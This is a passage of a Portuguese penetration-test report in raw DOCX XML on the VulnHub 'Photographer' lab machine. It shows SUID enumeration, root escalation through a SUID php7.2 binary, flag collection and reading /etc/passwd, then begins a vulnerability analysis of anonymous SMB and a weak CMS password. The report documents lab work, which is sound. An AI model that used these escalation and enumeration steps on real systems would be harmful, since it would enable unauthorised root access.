        <w:t xml:space="preserve">A conexão foi estabelecida com sucesso, fornecendo um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> interativo como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-data na máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> foi estabilizado com Python3 e os comandos </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para obter uma sessão TTY completa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127B8844" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="28276176" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>8 ESCALAÇÃO DE PRIVILÉGIOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D2ADA8" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>8.1 Enumeração Pós-Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725CCBF0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Após obter o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> inicial como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>www</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-data, foram executados comandos de enumeração para identificar vetores de escalação de privilégios. A verificação de binários com bit SUID (Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>User</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ID) revelou um caminho direto para root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08A215" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>find / -perm -4000 -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3EEF0B" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Entre os binários listados, destacou-se o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/bin/php7.2 com bit SUID configurado. A presença do interpretador PHP com SUID é uma </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> grave, pois permite que qualquer usuário execute código PHP com os privilégios do proprietário do binário, que é root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C657D19" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>8.2 Exploração do SUID — php7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7CE48C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Utilizando a técnica documentada no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para o binário </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> com SUID, foi executado o seguinte comando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400A701" w14:textId="37467F60" w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8" w:rsidRDefault="00BC1FC8" w:rsidP="00BC1FC8">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC1FC8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="500C5408" wp14:editId="0D2C633A">
            <wp:extent cx="2897291" cy="3365500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="355097507"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99831" cy="3368451"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA82607" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O comando define o UID efetivo do processo para 0 (root) via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>posix_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>setuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) e executa um </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. O prompt imediatamente se alterou para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, confirmando a escalação de privilégios para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>superusuário</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7D5CE" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8.3 Coleta de Flags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA71F49" w14:textId="64A180D7" w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8" w:rsidRDefault="00000000" w:rsidP="00BC1FC8">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Com acesso root, foram coletadas a flag do desafio</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8">
        <w:t>, por dois meios</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FC8">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00BC1FC8" w:rsidRPr="00BC1FC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48960E15" wp14:editId="4A48A704">
            <wp:extent cx="5579745" cy="6367780"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="935997592"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6367780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61EB99" w14:textId="09681455" w:rsidR="00DA7219" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4698030E" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Flag de root (/root/proof.txt): d41d8cd98f00b204e9800998ecf8427e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA0BF3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Flag de usuário (/home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/user.txt): d41d8cd98f00b204e9800998ecf8427e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C693748" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="3B7A7C01" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ambas as flags correspondem ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> MD5 de um arquivo vazio, conforme padrão da máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, representando a prova de comprometimento total do sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F40AB4" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>8.4 Enumeração de Usuários do Sistema</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014B7B27" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Com acesso root foi possível enumerar os usuários locais do sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C03FE3" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cat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etc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passwd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grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -E '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>daisa|agi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355FD490" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Os resultados confirmaram dois usuários:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386A693C" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>daisa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> — UID 1000, diretório home em /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osboxes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (inexistente), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554033A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UID 1001, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diretório</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> home </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>em</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F85848">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, shell /bin/bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630CBF81" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRPr="00F85848" w:rsidRDefault="00DA7219">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D9CCEB" w14:textId="77777777" w:rsidR="009F6024" w:rsidRPr="009F6024" w:rsidRDefault="00000000" w:rsidP="009F6024">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O diretório /home/agi continha os arquivos típicos de um usuário desktop Ubuntu, incluindo Desktop, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Documents</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Downloads e o diretório </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que correspondia exatamente ao compartilhamento SMB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sambashare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> explorado na fase de enumeração, contendo os arquivos mailsent.txt e wordpress.bkp.zip.</w:t>
      </w:r>
      <w:r w:rsidR="009F6024">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009F6024">
        <w:br/>
      </w:r>
      <w:r w:rsidR="009F6024" w:rsidRPr="009F6024">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conteúdo do arquivo proof.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997439D" w14:textId="77777777" w:rsidR="009F6024" w:rsidRPr="009F6024" w:rsidRDefault="009F6024" w:rsidP="009F6024">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve">Após a escalação de privilégios para root, foi executado o comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve"> /root/proof.txt, que exibiu uma arte ASCII representando o logotipo do CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>Koken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>, seguida das informações de autoria da máquina e da flag de comprometimento:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B09BBA0" w14:textId="77777777" w:rsidR="009F6024" w:rsidRPr="009F6024" w:rsidRDefault="009F6024" w:rsidP="009F6024">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6024">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow me at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="009F6024">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://v1n1v131r4.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F6F9794" w14:textId="77777777" w:rsidR="009F6024" w:rsidRPr="009F6024" w:rsidRDefault="009F6024" w:rsidP="009F6024">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6024">
        <w:t>Flag de root: d41d8cd98f00b204e9800998ecf8427e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716FA48" w14:textId="69B15F18" w:rsidR="009F6024" w:rsidRDefault="009F6024" w:rsidP="009F6024">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve">O </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>handle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve"> v1n1v131r4 identifica o criador da máquina </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>Photographer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve"> no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>VulnHub</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve">. A flag corresponde ao </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6024">
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6024">
        <w:t xml:space="preserve"> MD5 de um arquivo vazio, padrão utilizado pelo autor em suas máquinas para confirmar o comprometimento total do sistema sem expor dados sensíveis reais.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1BA63B" w14:textId="67178A95" w:rsidR="00DA7219" w:rsidRDefault="00BC1FC8" w:rsidP="00BC1FC8">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC1FC8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3186F95F" wp14:editId="757E720A">
            <wp:extent cx="5579745" cy="3726815"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="257326029"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3726815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC514A0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00DA7219"/>
    <w:p w14:paraId="19B52D3F" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:caps/>
        </w:rPr>
        <w:t>9 ANÁLISE DE VULNERABILIDADES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56958BBF" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>9.1 SMB Acessível Anonimamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421F11A0" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">O serviço Samba foi configurado para aceitar sessões nulas, permitindo que qualquer usuário na rede listasse compartilhamentos e acessasse arquivos sem qualquer credencial. O compartilhamento </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sambashare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> continha arquivos sensíveis, incluindo um e-mail com dica direta para a senha do administrador do CMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF40EE7" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Classificação OWASP 2025: Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Classificação CWE: CWE-284 — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Improper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Control</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Severidade: Alta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EC7D58" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t>9.2 Credencial Fraca e Armazenamento Inseguro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091997A" w14:textId="77777777" w:rsidR="00DA7219" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A senha </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>babygirl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
